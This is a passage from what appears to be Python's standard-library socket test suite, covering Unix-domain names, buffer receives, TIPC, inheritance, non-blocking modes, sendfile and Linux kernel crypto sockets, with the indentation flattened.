self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(os_helper.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if os_helper.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(os_helper.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
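        # nbytes (1024) exceeds the 8-byte buffer, so recvfrom_into() must
        # raise ValueError rather than writing past the end of the buffer.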
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules", encoding="utf-8")
except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory or if we
        # don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
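        # Bind the server to a TIPC name sequence covering service instances
        # TIPC_LOWER..TIPC_UPPER of type TIPC_STYPE; the client then sends to
        # a single named instance inside that range.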
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
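# Illustrative sketch (not part of the test suite): the comment in
# NonblockConstantTest.checkNonblock above distinguishes three socket modes.
# This helper, assuming only the standard library, shows how gettimeout() and
# getblocking() report each mode.
def _demo_socket_modes():
    import socket as _socket
    with _socket.socket() as s:
        s.setblocking(True)        # blocking: no timeout at all
        assert s.gettimeout() is None and s.getblocking()
        s.settimeout(2.0)          # timeout: "blocking" from the API's point of
                                   # view, but the fd is non-blocking internally
        assert s.gettimeout() == 2.0 and s.getblocking()
        s.setblocking(False)       # non-blocking: equivalent to settimeout(0.0)
        assert s.gettimeout() == 0.0 and not s.getblocking()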
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(os_helper.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(os_helper.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
os_helper.unlink(os_helper.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = os_helper.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(os_helper.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(os_helper.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(TimeoutError, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(os_helper.TESTFN, encoding="utf-8") as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
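# Illustrative sketch (not part of the test suite): the tests above exercise the
# two private implementations behind socket.sendfile().  Application code uses
# only the public method, which prefers os.sendfile() and silently falls back
# to plain send() when it is unavailable.  The host and port below are
# placeholders.
def _demo_sendfile(path, host="127.0.0.1", port=8080):
    import socket as _socket
    with open(path, "rb") as f, _socket.create_connection((host, port)) as conn:
        # offset and count default to sending the whole file from the start
        return conn.sendfile(f)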
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
class TestMacOSTCPFlags(unittest.TestCase):
def test_tcp_keepalive(self):
self.assertTrue(socket.TCP_KEEPALIVE)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
